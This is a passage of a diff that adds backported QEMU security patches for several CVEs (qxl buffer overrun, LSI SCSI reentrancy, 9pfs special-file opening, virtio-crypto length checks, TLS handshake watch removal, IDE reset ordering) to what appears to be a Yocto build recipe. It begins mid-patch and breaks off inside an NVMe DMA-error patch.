+From 09a07b5b39c87423df9e8f6574c19a14d36beac5 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 27 Jul 2022 10:34:12 +0530
+Subject: [PATCH] CVE-2022-35414
+
+Upstream-Status: Backport [https://github.com/qemu/qemu/commit/418ade7849ce7641c0f7333718caf5091a02fd4c]
+CVE: CVE-2022-35414
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ exec.c | 13 ++++++++++++-
+ 1 file changed, 12 insertions(+), 1 deletion(-)
+
+diff --git a/exec.c b/exec.c
+index 43c70ffb..2d6add46 100644
+--- a/exec.c
++++ b/exec.c
+@@ -685,7 +685,7 @@ static void tcg_iommu_free_notifier_list(CPUState *cpu)
+
+ /* Called from RCU critical section */
+ MemoryRegionSection *
+-address_space_translate_for_iotlb(CPUState *cpu, int asidx, hwaddr addr,
++address_space_translate_for_iotlb(CPUState *cpu, int asidx, hwaddr orig_addr,
+ hwaddr *xlat, hwaddr *plen,
+ MemTxAttrs attrs, int *prot)
+ {
+@@ -694,6 +694,7 @@ address_space_translate_for_iotlb(CPUState *cpu, int asidx, hwaddr addr,
+ IOMMUMemoryRegionClass *imrc;
+ IOMMUTLBEntry iotlb;
+ int iommu_idx;
++ hwaddr addr = orig_addr;
+ AddressSpaceDispatch *d = atomic_rcu_read(&cpu->cpu_ases[asidx].memory_dispatch);
+
+ for (;;) {
+@@ -737,6 +738,16 @@ address_space_translate_for_iotlb(CPUState *cpu, int asidx, hwaddr addr,
+ return section;
+
+ translate_fail:
++ /*
++ * We should be given a page-aligned address -- certainly
++ * tlb_set_page_with_attrs() does so. The page offset of xlat
++ * is used to index sections[], and PHYS_SECTION_UNASSIGNED = 0.
++ * The page portion of xlat will be logged by memory_region_access_valid()
++ * when this memory access is rejected, so use the original untranslated
++ * physical address.
++ */
++ assert((orig_addr & ~TARGET_PAGE_MASK) == 0);
++ *xlat = orig_addr;
+ return &d->map.sections[PHYS_SECTION_UNASSIGNED];
+ }
+ #endif
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2022-4144.patch b/meta/recipes-devtools/qemu/qemu/CVE-2022-4144.patch
new file mode 100644
index 0000000000..3f0d5fbd5c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-4144.patch
@@ -0,0 +1,103 @@
+From 6dbbf055148c6f1b7d8a3251a65bd6f3d1e1f622 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <philmd@linaro.org>
+Date: Mon, 28 Nov 2022 21:27:40 +0100
+Subject: [PATCH] hw/display/qxl: Avoid buffer overrun in qxl_phys2virt
+ (CVE-2022-4144)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Have qxl_get_check_slot_offset() return false if the requested
+buffer size does not fit within the slot memory region.
+
+Similarly qxl_phys2virt() now returns NULL in such case, and
+qxl_dirty_one_surface() aborts.
+
+This avoids buffer overrun in the host pointer returned by
+memory_region_get_ram_ptr().
+
+Fixes: CVE-2022-4144 (out-of-bounds read)
+Reported-by: Wenxu Yin (@awxylitol)
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/1336
+
+Signed-off-by: Philippe Mathieu-Daudé <philmd@linaro.org>
+Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
+Message-Id: <20221128202741.4945-5-philmd@linaro.org>
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/6dbbf055148c6f1b7d8a3251a65bd6f3d1e1f622]
+CVE: CVE-2022-4144
+Comments: Deleted patch hunk in qxl.h,as it contains change
+in comments which is not present in current version of qemu.
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ hw/display/qxl.c | 27 +++++++++++++++++++++++----
+ 1 file changed, 23 insertions(+), 4 deletions(-)
+
+diff --git a/hw/display/qxl.c b/hw/display/qxl.c
+index cd7eb39d..6bc8385b 100644
+--- a/hw/display/qxl.c
++++ b/hw/display/qxl.c
+@@ -1440,11 +1440,13 @@ static void qxl_reset_surfaces(PCIQXLDevice *d)
+
+ /* can be also called from spice server thread context */
+ static bool qxl_get_check_slot_offset(PCIQXLDevice *qxl, QXLPHYSICAL pqxl,
+- uint32_t *s, uint64_t *o)
++ uint32_t *s, uint64_t *o,
++ size_t size_requested)
+ {
+ uint64_t phys = le64_to_cpu(pqxl);
+ uint32_t slot = (phys >> (64 - 8)) & 0xff;
+ uint64_t offset = phys & 0xffffffffffff;
++ uint64_t size_available;
+
+ if (slot >= NUM_MEMSLOTS) {
+ qxl_set_guest_bug(qxl, "slot too large %d >= %d", slot,
+@@ -1468,6 +1470,23 @@ static bool qxl_get_check_slot_offset(PCIQXLDevice *qxl, QXLPHYSICAL pqxl,
+ slot, offset, qxl->guest_slots[slot].size);
+ return false;
+ }
++ size_available = memory_region_size(qxl->guest_slots[slot].mr);
++ if (qxl->guest_slots[slot].offset + offset >= size_available) {
++ qxl_set_guest_bug(qxl,
++ "slot %d offset %"PRIu64" > region size %"PRIu64"\n",
++ slot, qxl->guest_slots[slot].offset + offset,
++ size_available);
++ return false;
++ }
++ size_available -= qxl->guest_slots[slot].offset + offset;
++ if (size_requested > size_available) {
++ qxl_set_guest_bug(qxl,
++ "slot %d offset %"PRIu64" size %zu: "
++ "overrun by %"PRIu64" bytes\n",
++ slot, offset, size_requested,
++ size_requested - size_available);
++ return false;
++ }
+
+ *s = slot;
+ *o = offset;
+@@ -1486,7 +1505,7 @@ void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL pqxl, int group_id)
+ offset = le64_to_cpu(pqxl) & 0xffffffffffff;
+ return (void *)(intptr_t)offset;
+ case MEMSLOT_GROUP_GUEST:
+- if (!qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset)) {
++ if (!qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset, size)) {
+ return NULL;
+ }
+ ptr = memory_region_get_ram_ptr(qxl->guest_slots[slot].mr);
+@@ -1944,9 +1963,9 @@ static void qxl_dirty_one_surface(PCIQXLDevice *qxl, QXLPHYSICAL pqxl,
+ uint32_t slot;
+ bool rc;
+
+- rc = qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset);
+- assert(rc == true);
+ size = (uint64_t)height * abs(stride);
++ rc = qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset, size);
++ assert(rc == true);
+ trace_qxl_surfaces_dirty(qxl->id, offset, size);
+ qxl_set_dirty(qxl->guest_slots[slot].mr,
+ qxl->guest_slots[slot].offset + offset,
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2023-0330.patch b/meta/recipes-devtools/qemu/qemu/CVE-2023-0330.patch
new file mode 100644
index 0000000000..26e22b4c31
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-0330.patch
@@ -0,0 +1,77 @@
+[Ubuntu note: remove fuzz-lsi53c895a-test.c changes since the file does not
+ exist for this release]
+From b987718bbb1d0eabf95499b976212dd5f0120d75 Mon Sep 17 00:00:00 2001
+From: Thomas Huth <thuth@redhat.com>
+Date: Mon, 22 May 2023 11:10:11 +0200
+Subject: [PATCH] hw/scsi/lsi53c895a: Fix reentrancy issues in the LSI
+ controller (CVE-2023-0330)
+
+We cannot use the generic reentrancy guard in the LSI code, so
+we have to manually prevent endless reentrancy here. The problematic
+lsi_execute_script() function has already a way to detect whether
+too many instructions have been executed - we just have to slightly
+change the logic here that it also takes into account if the function
+has been called too often in a reentrant way.
+
+The code in fuzz-lsi53c895a-test.c has been taken from an earlier
+patch by Mauro Matteo Cascella.
+
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/1563
+Message-Id: <20230522091011.1082574-1-thuth@redhat.com>
+Reviewed-by: Stefan Hajnoczi <stefanha@redhat.com>
+Reviewed-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Thomas Huth <thuth@redhat.com>
+
+Reference: https://launchpad.net/ubuntu/+source/qemu/1:4.2-3ubuntu6.27
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2023-0330.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.com/qemu-project/qemu/-/commit/b987718bbb1d0eabf95499b976212dd5f0120d75]
+CVE: CVE-2023-0330
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ hw/scsi/lsi53c895a.c | 23 +++++++++++++++------
+ tests/qtest/fuzz-lsi53c895a-test.c | 33 ++++++++++++++++++++++++++++++
+ 2 files changed, 50 insertions(+), 6 deletions(-)
+
+--- qemu-4.2.orig/hw/scsi/lsi53c895a.c
++++ qemu-4.2/hw/scsi/lsi53c895a.c
+@@ -1135,15 +1135,24 @@ static void lsi_execute_script(LSIState
+ uint32_t addr, addr_high;
+ int opcode;
+ int insn_processed = 0;
++ static int reentrancy_level;
++
++ reentrancy_level++;
+
+ s->istat1 |= LSI_ISTAT1_SRUN;
+ again:
+- if (++insn_processed > LSI_MAX_INSN) {
+- /* Some windows drivers make the device spin waiting for a memory
+- location to change. If we have been executed a lot of code then
+- assume this is the case and force an unexpected device disconnect.
+- This is apparently sufficient to beat the drivers into submission.
+- */
++ /*
++ * Some windows drivers make the device spin waiting for a memory location
++ * to change. If we have executed more than LSI_MAX_INSN instructions then
++ * assume this is the case and force an unexpected device disconnect. This
++ * is apparently sufficient to beat the drivers into submission.
++ *
++ * Another issue (CVE-2023-0330) can occur if the script is programmed to
++ * trigger itself again and again. Avoid this problem by stopping after
++ * being called multiple times in a reentrant way (8 is an arbitrary value
++ * which should be enough for all valid use cases).
++ */
++ if (++insn_processed > LSI_MAX_INSN || reentrancy_level > 8) {
+ if (!(s->sien0 & LSI_SIST0_UDC)) {
+ qemu_log_mask(LOG_GUEST_ERROR,
+ "lsi_scsi: inf. loop with UDC masked");
+@@ -1597,6 +1606,8 @@ again:
+ }
+ }
+ trace_lsi_execute_script_stop();
++
++ reentrancy_level--;
+ }
+
+ static uint8_t lsi_reg_readb(LSIState *s, int offset)
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2023-2861.patch b/meta/recipes-devtools/qemu/qemu/CVE-2023-2861.patch
new file mode 100644
index 0000000000..70b7d6c562
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-2861.patch
@@ -0,0 +1,178 @@
+From f6b0de53fb87ddefed348a39284c8e2f28dc4eda Mon Sep 17 00:00:00 2001
+From: Christian Schoenebeck <qemu_oss@crudebyte.com>
+Date: Wed, 7 Jun 2023 18:29:33 +0200
+Subject: [PATCH] 9pfs: prevent opening special files (CVE-2023-2861)
+
+The 9p protocol does not specifically define how server shall behave when
+client tries to open a special file, however from security POV it does
+make sense for 9p server to prohibit opening any special file on host side
+in general. A sane Linux 9p client for instance would never attempt to
+open a special file on host side, it would always handle those exclusively
+on its guest side. A malicious client however could potentially escape
+from the exported 9p tree by creating and opening a device file on host
+side.
+
+With QEMU this could only be exploited in the following unsafe setups:
+
+ - Running QEMU binary as root AND 9p 'local' fs driver AND 'passthrough'
+ security model.
+
+or
+
+ - Using 9p 'proxy' fs driver (which is running its helper daemon as
+ root).
+
+These setups were already discouraged for safety reasons before,
+however for obvious reasons we are now tightening behaviour on this.
+
+Fixes: CVE-2023-2861
+Reported-by: Yanwu Shen <ywsPlz@gmail.com>
+Reported-by: Jietao Xiao <shawtao1125@gmail.com>
+Reported-by: Jinku Li <jkli@xidian.edu.cn>
+Reported-by: Wenbo Shen <shenwenbo@zju.edu.cn>
+Signed-off-by: Christian Schoenebeck <qemu_oss@crudebyte.com>
+Reviewed-by: Greg Kurz <groug@kaod.org>
+Reviewed-by: Michael Tokarev <mjt@tls.msk.ru>
+Message-Id: <E1q6w7r-0000Q0-NM@lizzy.crudebyte.com>
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/f6b0de53fb87ddefed348a39284c8e2f28dc4eda]
+CVE: CVE-2023-2861
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ fsdev/virtfs-proxy-helper.c | 27 +++++++++++++++++++++++--
+ hw/9pfs/9p-util.h | 40 +++++++++++++++++++++++++++++++++++++
+ 2 files changed, 65 insertions(+), 2 deletions(-)
+
+diff --git a/fsdev/virtfs-proxy-helper.c b/fsdev/virtfs-proxy-helper.c
+index 6f132c5f..300c9765 100644
+--- a/fsdev/virtfs-proxy-helper.c
++++ b/fsdev/virtfs-proxy-helper.c
+@@ -26,6 +26,7 @@
+ #include "qemu/xattr.h"
+ #include "9p-iov-marshal.h"
+ #include "hw/9pfs/9p-proxy.h"
++#include "hw/9pfs/9p-util.h"
+ #include "fsdev/9p-iov-marshal.h"
+
+ #define PROGNAME "virtfs-proxy-helper"
+@@ -350,6 +351,28 @@ static void resetugid(int suid, int sgid)
+ }
+ }
+
++/*
++ * Open regular file or directory. Attempts to open any special file are
++ * rejected.
++ *
++ * returns file descriptor or -1 on error
++ */
++static int open_regular(const char *pathname, int flags, mode_t mode)
++{
++ int fd;
++
++ fd = open(pathname, flags, mode);
++ if (fd < 0) {
++ return fd;
++ }
++
++ if (close_if_special_file(fd) < 0) {
++ return -1;
++ }
++
++ return fd;
++}
++
+ /*
+ * send response in two parts
+ * 1) ProxyHeader
+@@ -694,7 +717,7 @@ static int do_create(struct iovec *iovec)
+ if (ret < 0) {
+ goto unmarshal_err_out;
+ }
+- ret = open(path.data, flags, mode);
++ ret = open_regular(path.data, flags, mode);
+ if (ret < 0) {
+ ret = -errno;
+ }
+@@ -719,7 +742,7 @@ static int do_open(struct iovec *iovec)
+ if (ret < 0) {
+ goto err_out;
+ }
+- ret = open(path.data, flags);
++ ret = open_regular(path.data, flags, 0);
+ if (ret < 0) {
+ ret = -errno;
+ }
+diff --git a/hw/9pfs/9p-util.h b/hw/9pfs/9p-util.h
+index 546f46dc..79fdd2a3 100644
+--- a/hw/9pfs/9p-util.h
++++ b/hw/9pfs/9p-util.h
+@@ -13,12 +13,16 @@
+ #ifndef QEMU_9P_UTIL_H
+ #define QEMU_9P_UTIL_H
+
++#include "qemu/error-report.h"
++
+ #ifdef O_PATH
+ #define O_PATH_9P_UTIL O_PATH
+ #else
+ #define O_PATH_9P_UTIL 0
+ #endif
+
++#define qemu_fstat fstat
++
+ static inline void close_preserve_errno(int fd)
+ {
+ int serrno = errno;
+@@ -26,6 +30,38 @@ static inline void close_preserve_errno(int fd)
+ errno = serrno;
+ }
+
++/**
++ * close_if_special_file() - Close @fd if neither regular file nor directory.
++ *
++ * @fd: file descriptor of open file
++ * Return: 0 on regular file or directory, -1 otherwise
++ *
++ * CVE-2023-2861: Prohibit opening any special file directly on host
++ * (especially device files), as a compromised client could potentially gain
++ * access outside exported tree under certain, unsafe setups. We expect
++ * client to handle I/O on special files exclusively on guest side.
++ */
++static inline int close_if_special_file(int fd)
++{
++ struct stat stbuf;
++
++ if (qemu_fstat(fd, &stbuf) < 0) {
++ close_preserve_errno(fd);
++ return -1;
++ }
++ if (!S_ISREG(stbuf.st_mode) && !S_ISDIR(stbuf.st_mode)) {
++ error_report_once(
++ "9p: broken or compromised client detected; attempt to open "
++ "special file (i.e. neither regular file, nor directory)"
++ );
++ close(fd);
++ errno = ENXIO;
++ return -1;
++ }
++
++ return 0;
++}
++
+ static inline int openat_dir(int dirfd, const char *name)
+ {
+ return openat(dirfd, name,
+@@ -56,6 +92,10 @@ again:
+ return -1;
+ }
+
++ if (close_if_special_file(fd) < 0) {
++ return -1;
++ }
++
+ serrno = errno;
+ /* O_NONBLOCK was only needed to open the file. Let's drop it. We don't
+ * do that with O_PATH since fcntl(F_SETFL) isn't supported, and openat()
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2023-3180.patch b/meta/recipes-devtools/qemu/qemu/CVE-2023-3180.patch
new file mode 100644
index 0000000000..7144bdca46
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-3180.patch
@@ -0,0 +1,49 @@
+From 9d38a8434721a6479fe03fb5afb150ca793d3980 Mon Sep 17 00:00:00 2001
+From: zhenwei pi <pizhenwei@bytedance.com>
+Date: Thu, 3 Aug 2023 10:43:13 +0800
+Subject: [PATCH] virtio-crypto: verify src&dst buffer length for sym request
+
+For symmetric algorithms, the length of ciphertext must be as same
+as the plaintext.
+The missing verification of the src_len and the dst_len in
+virtio_crypto_sym_op_helper() may lead buffer overflow/divulged.
+
+This patch is originally written by Yiming Tao for QEMU-SECURITY,
+resend it(a few changes of error message) in qemu-devel.
+
+Fixes: CVE-2023-3180
+Fixes: 04b9b37edda("virtio-crypto: add data queue processing handler")
+Cc: Gonglei <arei.gonglei@huawei.com>
+Cc: Mauro Matteo Cascella <mcascell@redhat.com>
+Cc: Yiming Tao <taoym@zju.edu.cn>
+Signed-off-by: zhenwei pi <pizhenwei@bytedance.com>
+Message-Id: <20230803024314.29962-2-pizhenwei@bytedance.com>
+Reviewed-by: Michael S. Tsirkin <mst@redhat.com>
+Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
+
+Upstream-Status: Backport from [https://gitlab.com/qemu-project/qemu/-/commit/9d38a8434721a6479fe03fb5afb150ca793d3980]
+CVE: CVE-2023-3180
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ hw/virtio/virtio-crypto.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/hw/virtio/virtio-crypto.c b/hw/virtio/virtio-crypto.c
+index 44faf5a522b..13aec771e11 100644
+--- a/hw/virtio/virtio-crypto.c
++++ b/hw/virtio/virtio-crypto.c
+@@ -634,6 +634,11 @@ virtio_crypto_sym_op_helper(VirtIODevice *vdev,
+ return NULL;
+ }
+
++ if (unlikely(src_len != dst_len)) {
++ virtio_error(vdev, "sym request src len is different from dst len");
++ return NULL;
++ }
++
+ max_len = (uint64_t)iv_len + aad_len + src_len + dst_len + hash_result_len;
+ if (unlikely(max_len > vcrypto->conf.max_size)) {
+ virtio_error(vdev, "virtio-crypto too big length");
+--
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2023-3354.patch b/meta/recipes-devtools/qemu/qemu/CVE-2023-3354.patch
new file mode 100644
index 0000000000..2942e84cac
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-3354.patch
@@ -0,0 +1,87 @@
+From 10be627d2b5ec2d6b3dce045144aa739eef678b4 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Daniel=20P=2E=20Berrang=C3=A9?= <berrange@redhat.com>
+Date: Tue, 20 Jun 2023 09:45:34 +0100
+Subject: [PATCH] io: remove io watch if TLS channel is closed during handshake
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The TLS handshake make take some time to complete, during which time an
+I/O watch might be registered with the main loop. If the owner of the
+I/O channel invokes qio_channel_close() while the handshake is waiting
+to continue the I/O watch must be removed. Failing to remove it will
+later trigger the completion callback which the owner is not expecting
+to receive. In the case of the VNC server, this results in a SEGV as
+vnc_disconnect_start() tries to shutdown a client connection that is
+already gone / NULL.
+
+CVE-2023-3354
+Reported-by: jiangyegen <jiangyegen@huawei.com>
+Signed-off-by: Daniel P. Berrangé <berrange@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/10be627d2b5ec2d6b3dce045144aa739eef678b4]
+CVE: CVE-2023-3354
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ include/io/channel-tls.h | 1 +
+ io/channel-tls.c | 18 ++++++++++++------
+ 2 files changed, 13 insertions(+), 6 deletions(-)
+
+diff --git a/include/io/channel-tls.h b/include/io/channel-tls.h
+index fdbdf12f..e49e2831 100644
+--- a/include/io/channel-tls.h
++++ b/include/io/channel-tls.h
+@@ -49,6 +49,7 @@ struct QIOChannelTLS {
+ QIOChannel *master;
+ QCryptoTLSSession *session;
+ QIOChannelShutdown shutdown;
++ guint hs_ioc_tag;
+ };
+
+ /**
+diff --git a/io/channel-tls.c b/io/channel-tls.c
+index 7ec8ceff..8b32fbde 100644
+--- a/io/channel-tls.c
++++ b/io/channel-tls.c
+@@ -194,12 +194,13 @@ static void qio_channel_tls_handshake_task(QIOChannelTLS *ioc,
+ }
+
+ trace_qio_channel_tls_handshake_pending(ioc, status);
+- qio_channel_add_watch_full(ioc->master,
+- condition,
+- qio_channel_tls_handshake_io,
+- data,
+- NULL,
+- context);
++ ioc->hs_ioc_tag =
++ qio_channel_add_watch_full(ioc->master,
++ condition,
++ qio_channel_tls_handshake_io,
++ data,
++ NULL,
++ context);
+ }
+ }
+
+@@ -214,6 +215,7 @@ static gboolean qio_channel_tls_handshake_io(QIOChannel *ioc,
+ QIOChannelTLS *tioc = QIO_CHANNEL_TLS(
+ qio_task_get_source(task));
+
++ tioc->hs_ioc_tag = 0;
+ g_free(data);
+ qio_channel_tls_handshake_task(tioc, task, context);
+
+@@ -371,6 +373,10 @@ static int qio_channel_tls_close(QIOChannel *ioc,
+ {
+ QIOChannelTLS *tioc = QIO_CHANNEL_TLS(ioc);
+
++ if (tioc->hs_ioc_tag) {
++ g_clear_handle_id(&tioc->hs_ioc_tag, g_source_remove);
++ }
++
+ return qio_channel_close(tioc->master, errp);
+ }
+
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2023-5088.patch b/meta/recipes-devtools/qemu/qemu/CVE-2023-5088.patch
new file mode 100644
index 0000000000..db02210fa4
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-5088.patch
@@ -0,0 +1,114 @@
+From 7d7512019fc40c577e2bdd61f114f31a9eb84a8e Mon Sep 17 00:00:00 2001
+From: Fiona Ebner <f.ebner@proxmox.com>
+Date: Wed, 6 Sep 2023 15:09:21 +0200
+Subject: [PATCH] hw/ide: reset: cancel async DMA operation before resetting
+ state
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+If there is a pending DMA operation during ide_bus_reset(), the fact
+that the IDEState is already reset before the operation is canceled
+can be problematic. In particular, ide_dma_cb() might be called and
+then use the reset IDEState which contains the signature after the
+reset. When used to construct the IO operation this leads to
+ide_get_sector() returning 0 and nsector being 1. This is particularly
+bad, because a write command will thus destroy the first sector which
+often contains a partition table or similar.
+
+Traces showing the unsolicited write happening with IDEState
+0x5595af6949d0 being used after reset:
+
+> ahci_port_write ahci(0x5595af6923f0)[0]: port write [reg:PxSCTL] @ 0x2c: 0x00000300
+> ahci_reset_port ahci(0x5595af6923f0)[0]: reset port
+> ide_reset IDEstate 0x5595af6949d0
+> ide_reset IDEstate 0x5595af694da8
+> ide_bus_reset_aio aio_cancel
+> dma_aio_cancel dbs=0x7f64600089a0
+> dma_blk_cb dbs=0x7f64600089a0 ret=0
+> dma_complete dbs=0x7f64600089a0 ret=0 cb=0x5595acd40b30
+> ahci_populate_sglist ahci(0x5595af6923f0)[0]
+> ahci_dma_prepare_buf ahci(0x5595af6923f0)[0]: prepare buf limit=512 prepared=512
+> ide_dma_cb IDEState 0x5595af6949d0; sector_num=0 n=1 cmd=DMA WRITE
+> dma_blk_io dbs=0x7f6420802010 bs=0x5595ae2c6c30 offset=0 to_dev=1
+> dma_blk_cb dbs=0x7f6420802010 ret=0
+
+> (gdb) p *qiov
+> $11 = {iov = 0x7f647c76d840, niov = 1, {{nalloc = 1, local_iov = {iov_base = 0x0,
+> iov_len = 512}}, {__pad = "\001\000\000\000\000\000\000\000\000\000\000",
+> size = 512}}}
+> (gdb) bt
+> #0 blk_aio_pwritev (blk=0x5595ae2c6c30, offset=0, qiov=0x7f6420802070, flags=0,
+> cb=0x5595ace6f0b0 <dma_blk_cb>, opaque=0x7f6420802010)
+> at ../block/block-backend.c:1682
+> #1 0x00005595ace6f185 in dma_blk_cb (opaque=0x7f6420802010, ret=<optimized out>)
+> at ../softmmu/dma-helpers.c:179
+> #2 0x00005595ace6f778 in dma_blk_io (ctx=0x5595ae0609f0,
+> sg=sg@entry=0x5595af694d00, offset=offset@entry=0, align=align@entry=512,
+> io_func=io_func@entry=0x5595ace6ee30 <dma_blk_write_io_func>,
+> io_func_opaque=io_func_opaque@entry=0x5595ae2c6c30,
+> cb=0x5595acd40b30 <ide_dma_cb>, opaque=0x5595af6949d0,
+> dir=DMA_DIRECTION_TO_DEVICE) at ../softmmu/dma-helpers.c:244
+> #3 0x00005595ace6f90a in dma_blk_write (blk=0x5595ae2c6c30,
+> sg=sg@entry=0x5595af694d00, offset=offset@entry=0, align=align@entry=512,
+> cb=cb@entry=0x5595acd40b30 <ide_dma_cb>, opaque=opaque@entry=0x5595af6949d0)
+> at ../softmmu/dma-helpers.c:280
+> #4 0x00005595acd40e18 in ide_dma_cb (opaque=0x5595af6949d0, ret=<optimized out>)
+> at ../hw/ide/core.c:953
+> #5 0x00005595ace6f319 in dma_complete (ret=0, dbs=0x7f64600089a0)
+> at ../softmmu/dma-helpers.c:107
+> #6 dma_blk_cb (opaque=0x7f64600089a0, ret=0) at ../softmmu/dma-helpers.c:127
+> #7 0x00005595ad12227d in blk_aio_complete (acb=0x7f6460005b10)
+> at ../block/block-backend.c:1527
+> #8 blk_aio_complete (acb=0x7f6460005b10) at ../block/block-backend.c:1524
+> #9 blk_aio_write_entry (opaque=0x7f6460005b10) at ../block/block-backend.c:1594
+> #10 0x00005595ad258cfb in coroutine_trampoline (i0=<optimized out>,
+> i1=<optimized out>) at ../util/coroutine-ucontext.c:177
+
+Signed-off-by: Fiona Ebner <f.ebner@proxmox.com>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@linaro.org>
+Tested-by: simon.rowe@nutanix.com
+Message-ID: <20230906130922.142845-1-f.ebner@proxmox.com>
+Signed-off-by: Philippe Mathieu-Daudé <philmd@linaro.org>
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/7d7512019fc40c577e2bdd61f114f31a9eb84a8e]
+CVE: CVE-2023-5088
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ hw/ide/core.c | 14 +++++++-------
+ 1 file changed, 7 insertions(+), 7 deletions(-)
+
+diff --git a/hw/ide/core.c b/hw/ide/core.c
+index b5e0dcd29b2..63ba665f3d2 100644
+--- a/hw/ide/core.c
++++ b/hw/ide/core.c
+@@ -2515,19 +2515,19 @@ static void ide_dummy_transfer_stop(IDEState *s)
+
+ void ide_bus_reset(IDEBus *bus)
+ {
+- bus->unit = 0;
+- bus->cmd = 0;
+- ide_reset(&bus->ifs[0]);
+- ide_reset(&bus->ifs[1]);
+- ide_clear_hob(bus);
+-
+- /* pending async DMA */
++ /* pending async DMA - needs the IDEState before it is reset */
+ if (bus->dma->aiocb) {
+ trace_ide_bus_reset_aio();
+ blk_aio_cancel(bus->dma->aiocb);
+ bus->dma->aiocb = NULL;
+ }
+
++ bus->unit = 0;
++ bus->cmd = 0;
++ ide_reset(&bus->ifs[0]);
++ ide_reset(&bus->ifs[1]);
++ ide_clear_hob(bus);
++
+ /* reset dma provider too */
+ if (bus->dma->ops->reset) {
+ bus->dma->ops->reset(bus->dma);
+--
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/hw-block-nvme-handle-dma-errors.patch b/meta/recipes-devtools/qemu/qemu/hw-block-nvme-handle-dma-errors.patch
new file mode 100644
index 0000000000..0fdae8351a
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/hw-block-nvme-handle-dma-errors.patch
@@ -0,0 +1,146 @@
+From ea2a7c7676d8eb9d1458eaa4b717df46782dcb3a Mon Sep 17 00:00:00 2001
+From: Gaurav Gupta <gauragup@cisco.com>
+Date: Wed, 29 Mar 2023 14:07:17 -0700
+Subject: [PATCH 2/2] hw/block/nvme: handle dma errors
+
+Handling DMA errors gracefully is required for the device to pass the
+block/011 test ("disable PCI device while doing I/O") in the blktests
+suite.
+
+With this patch the device sets the Controller Fatal Status bit in the
+CSTS register when failing to read from a submission queue or writing to
+a completion queue; expecting the host to reset the controller.
+
+If DMA errors occur at any other point in the execution of the command
+(say, while mapping the PRPs), the command is aborted with a Data
+Transfer Error status code.
+
+Signed-off-by: Klaus Jensen <k.jensen@samsung.com>
+Signed-off-by: Gaurav Gupta <gauragup@cisco.com>
+---
+ hw/block/nvme.c | 41 +++++++++++++++++++++++++++++++----------
+ hw/block/trace-events | 3 +++
+ 2 files changed, 34 insertions(+), 10 deletions(-)
+
+diff --git a/hw/block/nvme.c b/hw/block/nvme.c
+index e6f24a6..bda446d 100644
+--- a/hw/block/nvme.c
++++ b/hw/block/nvme.c
+@@ -60,14 +60,14 @@ static bool nvme_addr_is_cmb(NvmeCtrl *n, hwaddr addr)
+ return addr >= low && addr < hi;
+ }
+
+-static void nvme_addr_read(NvmeCtrl *n, hwaddr addr, void *buf, int size)
++static int nvme_addr_read(NvmeCtrl *n, hwaddr addr, void *buf, int size)
+ {
+ if (n->cmbsz && nvme_addr_is_cmb(n, addr)) {
+ memcpy(buf, (void *)&n->cmbuf[addr - n->ctrl_mem.addr], size);
+- return;
++ return 0;
+ }
+
+- pci_dma_read(&n->parent_obj, addr, buf, size);
++ return pci_dma_read(&n->parent_obj, addr, buf, size);
+ }
+
+ static int nvme_check_sqid(NvmeCtrl *n, uint16_t sqid)
+@@ -152,6 +152,7 @@ static uint16_t nvme_map_prp(QEMUSGList *qsg, QEMUIOVector *iov, uint64_t prp1,
+ hwaddr trans_len = n->page_size - (prp1 % n->page_size);
+ trans_len = MIN(len, trans_len);
+ int num_prps = (len >> n->page_bits) + 1;
++ int ret;
+
+ if (unlikely(!prp1)) {
